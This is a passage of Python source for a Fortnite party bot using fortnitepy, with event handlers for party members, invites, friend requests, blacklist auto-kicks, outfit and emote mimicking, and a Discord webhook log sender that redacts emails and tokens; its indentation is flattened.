elif isinstance(self.pickaxemimic,str) and member.id == self.pickaxemimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"pickaxe"):
send(display_name_,f"Pickaxe_ID: {member_asset(member,'pickaxe')}")
if flag:
if not member_asset(member,"pickaxe"):
try:
await self.change_asset(self.user.id, "Harvesting Tool", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
await self.change_asset(self.user.id, "Harvesting Tool", member_asset(member,"pickaxe"), member.pickaxe_variants)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def party_member_emote_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.emotemimic,bool) and self.emotemimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
elif isinstance(self.emotemimic,str) and member.id == self.emotemimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"emote"):
send(display_name_,f"EID: {member_asset(member,'emote')}")
if flag:
if not member_asset(member,"emote"):
try:
await self.change_asset(self.user.id, "Emote", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
type_ = convert_to_type(member_asset(member,"emote"))
await self.change_asset(self.user.id, type_, member_asset(member,"emote"))
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
#Events
async def event_device_auth_generate(self, details: dict, email: str) -> None:
store_device_auth_details(email, details)
async def event_ready(self) -> None:
global first_boot
loop = asyncio.get_event_loop()
self.boot_time = time.time()
self.booted_utc = datetime.datetime.utcnow()
display_name = name(self.user)
send(display_name,f'{l("login")}: {display_name}',green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
flag = False
if first_boot:
first_boot = False
flag = True
self.isready = True
self.booting = False
if not self.visual_members:
if self.party:
self.visual_members = self.party.meta.squad_assignments
else:
self.visual_members = [{"memberId": self.user.id, "absoluteMemberIdx": 0}]
loadedclients.append(self)
client_name[self.user.display_name] = self
self.add_cache(self.user)
for user in (list(self.friends) + list(self.pending_friends) + list(self.blocked_users)):
self.add_cache(user)
loop.create_task(self.status_loop())
try:
if data['fortnite']['avatar_id'] == "{bot}":
self.set_avatar(fortnitepy.Avatar(asset=self.party.me.outfit, background_colors=data['fortnite']['avatar_color']))
else:
self.set_avatar(fortnitepy.Avatar(asset=data['fortnite']['avatar_id'].format(bot=self.party.me.outfit), background_colors=data['fortnite']['avatar_color']))
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
self.owner = []
for owner in data['fortnite']['owner']:
user = self.get_user(owner) or self.get_cache_user(owner)
if not user:
try:
user = await self.fetch_user(owner)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("owner_notfound",owner),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
friend = self.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_owner",commands["reload"]),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not self.is_pending(user.id):
try:
await self.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
self.owner.append(friend)
send(display_name,f'{l("owner")}: {name(friend)}',green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
if self.owner and data['fortnite']['click_invite']:
for owner in self.owner:
await owner.send(l("click_invite"))
async def _(listuser: str) -> None:
user = self.get_user(listuser) or self.get_cache_user(listuser)
if not user:
try:
user = await self.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("invitelist_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
friend = self.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_inviteuser",listuser,commands["reload"]),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not self.is_pending(user.id) and user.id != self.user.id:
try:
await self.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.invitelist.append(friend.id)
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite']['invitelist']])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f'invitelist {self.invitelist}',yellow,add_d=lambda x:f'```\n{x}\n```')
if data['fortnite']['acceptfriend']:
async def _(pending: fortnitepy.IncomingPendingFriend) -> None:
if self.acceptfriend is True:
try:
await pending.accept()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif self.acceptfriend is False:
try:
await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
await asyncio.gather(*[_(pending) for pending in self.incoming_pending_friends])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if flag:
lists = {
"blacklist": "blacklist",
"whitelist": "whitelist",
"otherbotlist": "botlist"
}
async def _(listuser: str) -> None:
user = self.get_user(listuser) or self.get_cache_user(listuser)
if not user:
try:
user = await self.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{data_}_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
if data_ == "blacklist" and data["fortnite"]["blacklist-autoblock"]:
try:
await user.block()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
globals()[list_].append(user.id)
for list_,data_ in lists.items():
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite'][list_]])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f"fortnite {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
lists = [
"outfitmimic",
"backpackmimic",
"pickaxemimic",
"emotemimic"
]
async def _(mimic: str) -> None:
if isinstance(data['fortnite'][mimic],str):
user = self.get_user(data['fortnite'][mimic]) or self.get_cache_user(data['fortnite'][mimic])
if not user:
try:
user = await self.fetch_user(data['fortnite'][mimic])
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{mimic}_user_notfound",data['fortnite'][mimic]),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
setattr(self,mimic,user.id)
if data['loglevel'] == "debug":
send(display_name,f"{mimic} {getattr(self,mimic)}",yellow,add_d=lambda x:f'```\n{x}\n```')
try:
await asyncio.gather(*[_(mimic) for mimic in lists])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['discord']['enabled']:
try:
await dclient.start(data['discord']['token'])
except Exception:
data["discord"]["enabled"] = False
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_before_close(self) -> None:
self.isready = False
self.boot_time = None
send(name(self.user),f'{l("closing")}: {self.user.display_name}',green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_restart(self) -> None:
self.boot_time = time.time()
send(name(self.user),l("relogin", self.user.display_name),green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_party_invite(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
if not self.isready or not invitation:
return
display_name = name(self.user)
self.add_cache(invitation.sender)
if invitation.sender.id in blacklist and data['fortnite']['blacklist-declineinvite']:
return
if invitation.sender.id in [owner.id for owner in self.owner]:
await self.invitation_accept(invitation)
return
if invitation.sender.id in whitelist and data['fortnite']['whitelist-allowinvite']:
await self.invitation_accept(invitation)
return
if data['loglevel'] == 'normal':
send(display_name,l("invite_from",name(invitation.sender)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(display_name,l("invite_from2",f'{name(invitation.sender)} [{platform_to_str(invitation.sender.platform)}]',invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
for owner in self.owner:
if self.party.get_member(owner.id) and data['fortnite']['invite-ownerdecline']:
await self.invitation_decline_owner(invitation)
return
if any(member.id in whitelist for member in self.party.members) and data['fortnite']['whitelist-declineinvite']:
await self.invitation_decline_whitelist(invitation)
elif not self.acceptinvite:
await self.invitation_decline(invitation)
elif not self.acceptinvite_interval:
await self.invitation_decline_interval(invitation)
else:
await self.invitation_accept(invitation)
async def event_friend_request(self, request: Union[fortnitepy.IncomingPendingFriend, fortnitepy.OutgoingPendingFriend]) -> None:
if not self.isready or not request:
return
display_name = name(self.user)
self.add_cache(request)
if request.outgoing:
send(display_name,l("friend_request_to",name(request)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
return
send(display_name,l("friend_request_from",name(request)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
if self.acceptfriend is True:
try:
await request.accept()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_accepting_friendrequest"),red,add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif self.acceptfriend is False:
try:
await request.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_declining_friendrequest"),red,add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("friend_request_decline",name(request)),red,add_d=lambda x:f'>>> {x}')
async def event_friend_add(self, friend: fortnitepy.Friend) -> None:
if not self.isready or not friend:
return
display_name = name(self.user)
self.add_cache(friend)
if friend.outgoing:
send(display_name,l("friend_accept",name(friend)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(display_name,l("friend_add",name(friend)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_friend_remove(self, friend: fortnitepy.Friend) -> None:
if not self.isready or not friend:
return
display_name = name(self.user)
self.add_cache(friend)
if data['loglevel'] == 'normal':
send(display_name,l("friend_remove",name(friend)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(display_name,l("friend_remove",f'{name(friend)} [{platform_to_str(friend.platform)}]'),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_party_member_join(self, member: fortnitepy.PartyMember) -> None:
try:
if member.id == self.user.id:
self.visual_members = self.party.meta.squad_assignments
else:
self.visual_members.append({"memberId": member.id, "absoluteMemberIdx": member.position})
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
loop = asyncio.get_event_loop()
loop.create_task(self.change_status())
if self.party.me.leader and (data['fortnite']['hide-user'] or data['fortnite']['hide-blacklist']):
async def _() -> None:
nonlocal member
try:
await asyncio.sleep(0.5)
if data['fortnite']['hide-user']:
if (not (member.id in [owner.id for owner in self.owner] and data['fortnite']['show-owner'])
and not (member.id in whitelist and data['fortnite']['show-whitelist'])
and not (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['show-bot'])
and member.id != self.user.id):
for squad in self.visual_members:
if squad["memberId"] == member.id:
self.visual_members.remove(squad)
elif data['fortnite']['hide-blacklist']:
if member.id in blacklist:
for squad in self.visual_members:
if squad["memberId"] == member.id:
self.visual_members.remove(squad)
real_members = self.party.meta.squad_assignments
prop = self.party.meta.set_squad_assignments(self.visual_members)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
await asyncio.sleep(2)
self.party.meta.set_squad_assignments(real_members)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
loop.create_task(_())
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l('party_member_joined',name(member),member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l('party_member_joined',f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if member.id in blacklist and self.party.me.leader:
if data['fortnite']['blacklist-autokick']:
try:
await member.kick()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif data['fortnite']['blacklist-autochatban']:
try:
await member.chatban()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend']:
for member_ in member.party.members:
try:
if not self.has_friend(member_.id) and not self.is_pending(member_.id) and not self.is_blocked(member_.id) and member_.id != self.user.id:
await self.add_friend(member_.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if self.joinmessageenable:
var = defaultdict(lambda: None)
var.update(self.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"member_display_name": member.display_name,
"member_id": member.id,
"member": member
}
)
try:
mes = eval_format(data['fortnite']['joinmessage'],var)
await self.party.send(mes)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if self.randommessageenable:
var = defaultdict(lambda: None)
var.update(self.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"member_display_name": member.display_name,
"member_id": member.id,
"member": member
}
)
try:
randommessage = random.choice(data['fortnite']['randommessage'])
mes = eval_format(randommessage,var)
send(display_name,f'{l("random_message")}: {mes}',add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
await self.party.send(mes)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await asyncio.sleep(0.1)
if data["fortnite"]["joinemote"]:
try:
await self.change_asset(self.user.id, "Emote", self.eid)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if self.party.leader.id == self.user.id:
try:
await self.party.set_playlist(data['fortnite']['playlist'])
await self.party.set_privacy(data['fortnite']['privacy'].value)
if data["fortnite"]["disable_voice"]:
await self.disable_voice()
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_leave(self, member: fortnitepy.PartyMember) -> None:
try:
if member.id == self.user.id:
self.visual_members = []
else:
for squad in self.visual_members:
if squad["memberId"] == member.id:
self.visual_members.remove(squad)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
loop = asyncio.get_event_loop()
loop.create_task(self.change_status())
if self.party.me.leader and (data['fortnite']['hide-user'] or data['fortnite']['hide-blacklist']):
async def _() -> None:
nonlocal member
try:
await asyncio.sleep(0.5)
real_members = self.party.meta.squad_assignments
prop = self.party.meta.set_squad_assignments(self.visual_members)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
await asyncio.sleep(2)
self.party.meta.set_squad_assignments(real_members)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
loop.create_task(_())
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_left",name(member),member.party.member_count),magenta,lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_left",f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',member.party.member_count),magenta,lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
if data['fortnite']['addfriend']:
for member_ in member.party.members:
if not self.has_friend(member_.id) and not self.is_pending(member_.id) and not self.is_blocked(member_.id) and member_.id != self.user.id:
try:
await self.add_friend(member_.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
continue
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_confirm(self, confirmation: fortnitepy.PartyJoinConfirmation) -> None:
if not self.isready or not confirmation:
return
self.add_cache(confirmation.user)
display_name = name(self.user)
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,l("party_member_request",name(confirmation.user)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if data['fortnite']['blacklist-autokick'] and confirmation.user.id in blacklist:
try:
await confirmation.reject()
except fortnitepy.HTTPException:
if data['loglevel'] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_declining_partyrequest"),red,add_d=lambda x:f'>>> {x}')
else:
try:
await confirmation.confirm()
except fortnitepy.HTTPException:
if data['loglevel'] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_accepting_partyrequest"),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_kick(self, member: fortnitepy.PartyMember) -> None:
try:
if member.id == self.user.id:
self.visual_members = []
else:
for squad in self.visual_members:
if squad["memberId"] == member.id:
self.visual_members.remove(squad)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not self.isready or not member:
return
self.add_cache(member)
if self.party.me.leader and member.id != self.user.id and (data['fortnite']['hide-user'] or data['fortnite']['hide-blacklist']):
async def _() -> None:
nonlocal member
try:
await asyncio.sleep(0.5)
real_members = self.party.meta.squad_assignments
prop = self.party.meta.set_squad_assignments(self.visual_members)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
await asyncio.sleep(2)
self.party.meta.set_squad_assignments(real_members)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
loop = asyncio.get_event_loop()
loop.create_task(_())
display_name_ = self.is_most()
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_kick",name(member.party.leader),name(member),member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_kick",f'{name(member.party.leader)} [{platform_to_str(member.party.leader.platform)}/{member.party.leader.input}]',f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
async def event_party_member_promote(self, old_leader: fortnitepy.PartyMember, new_leader: fortnitepy.PartyMember) -> None:
if not self.isready or not old_leader or not new_leader:
return
self.add_cache(old_leader)
self.add_cache(new_leader)
display_name = name(self.user)
display_name_ = self.is_most()
try:
if new_leader.id == self.user.id:
if data['fortnite']['hide-user']:
await self.hide()
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_promote",name(old_leader),name(new_leader)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_promote",f'{name(old_leader)} [{platform_to_str(old_leader.platform)}/{old_leader.input}]',f'{name(new_leader)} [{platform_to_str(new_leader.platform)}/{new_leader.input}]'),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if new_leader.id == self.user.id:
try:
await self.party.set_playlist(data['fortnite']['playlist'])
await self.party.set_privacy(data['fortnite']['privacy'].value)
if data["fortnite"]["disable_voice"]:
await self.disable_voice()
for member in self.party.members:
if member.id in blacklist:
if data['fortnite']['blacklist-autokick']:
try:
await member.kick()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif data['fortnite']['blacklist-autochatban']:
try:
await member.chatban()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_playlist_change(self, party: fortnitepy.ClientParty, before: tuple, after: tuple) -> None:
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,after[0])
async def event_party_member_update(self, member: fortnitepy.PartyMember) -> None:
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,l("party_member_update", f"{name(member)} [{platform_to_str(member.platform)}/{member.input}]"),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if member.id == self.user.id:
return
if member.id in blacklist and self.party.me.leader:
if data['fortnite']['blacklist-autokick']:
try:
await member.kick()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif data['fortnite']['blacklist-autochatban']:
try:
await member.chatban()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_outfit_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_outfit_change(member)
async def event_party_member_backpack_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_backpack_change(member)
async def event_party_member_pet_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_backpack_change(member)
async def event_party_member_pickaxe_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_pickaxe_change(member)
async def event_party_member_emote_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_emote_change(member)
async def event_party_member_emoji_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_emote_change(member)
async def event_party_member_zombie(self, member: fortnitepy.PartyMember) -> None:
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_disconnect",name(member)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_disconnect",f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]'),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if self.party.me.leader:
try:
await member.kick()
except Exception:
if data['loglevel'] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_chatban(self, member: fortnitepy.PartyMember, reason: Optional[str]) -> None:
if not self.isready or not member:
return
self.add_cache(member)
display_name_ = self.is_most()
if display_name_:
if data['loglevel'] == 'normal':
if not reason:
send(display_name_,l("party_member_chatban",name(member.party.leader),name(member)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_chatban2",name(member.party.leader),name(member),reason),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
if not reason:
send(display_name_,l("party_member_chatban",name(member.party.leader),name(member)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_chatban2",f'{name(member.party.leader)} [{platform_to_str(member.party.leader.platform)}/{member.party.leader.input}]',f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',reason),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
async def event_party_update(self, party: fortnitepy.Party) -> None:
if not self.isready or not party:
return
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,l("party_update"),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
async def event_friend_message(self, message: fortnitepy.FriendMessage) -> None:
await process_command(message)
async def event_party_message(self, message: fortnitepy.PartyMessage) -> None:
await process_command(message)
if True: # Functions (always-true block kept so editors can fold this section)
def now() -> str:
return datetime.datetime.now().strftime("%H:%M:%S")
def l(key: str, *args: Any, **kwargs: Any) -> Optional[str]:
text = localize.get(key)
if text:
return text.format(*args, **kwargs)
else:
return None
def name(user: Union[fortnitepy.user.UserBase, discord.user.User, WebUser]) -> str:
if data['loglevel'] == 'normal':
return user.display_name
else:
return f"{user.display_name} / {user.id}"
def render_template(file_: str, **kwargs: Any) -> sanic.response.HTTPResponse:
template = env.get_template(file_)
return sanic.response.html(template.render(**kwargs))
def dprint() -> None:
text_max = 1990
while True:
if data['discord-log']:
if data['skip-if-overflow'] and len(storedlogs) >= 50:
storedlogs.clear()
for num,log in enumerate(storedlogs):
try:
username = list(log.keys())[0]
content = list(log.values())[0]
if len(content) > text_max:
if data["omit-over2000"]:
text = content[:text_max] + "..."
res = requests.post(
data['webhook'],
json={
'username': username,
'content': text
}
)
else:
text = [content[i:i+text_max] for i in range(0, len(content), text_max)]
for text_ in text:
res = requests.post(
data['webhook'],
json={
'username': username,
'content': text_
}
)
if res.status_code == 429:
break  # rate limited: stop sending chunks for now
else:
continue  # all chunks sent: move on to the next stored log
break  # the chunk loop hit the rate limit: stop this cycle entirely
else:
res = requests.post(
data['webhook'],
json={
'username': username,
'content': content
}
)
if res.status_code == 204:
storedlogs.pop(num)  # 204 No Content: webhook accepted the message
if res.status_code == 429:
break  # rate limited: remaining logs are retried on the next 5s cycle
except TypeError:
if data['loglevel'] =='debug':
print(red(traceback.format_exc()))
try:
storedlogs.pop(num)
except Exception:
pass
continue
except Exception:
print(red(traceback.format_exc()))
print(red(f"{username}: {content} の送信中にエラーが発生しました"))
continue
time.sleep(5)
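# Chunking sketch: Discord webhooks cap messages at 2000 characters, so
# dprint posts at most text_max (1990) characters per request. With
# "omit-over2000" enabled the overflow is truncated with "...", otherwise
# the content is split into sequential chunks, e.g.:
#
#   content = "x" * 4000
#   chunks = [content[i:i+1990] for i in range(0, len(content), 1990)]
#   # -> three requests of 1990, 1990 and 20 characters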
def dstore(username: str, content: Any) -> None:
if data['discord-log']:
if data['hide-email']:
for email in data['fortnite']['email']:
content = content.replace(email,len(email)*"X")
if data['hide-token']:
for token in data['discord']['token'].split(','):
content = content.replace(token,len(token)*"X")
if data['hide-webhook']:
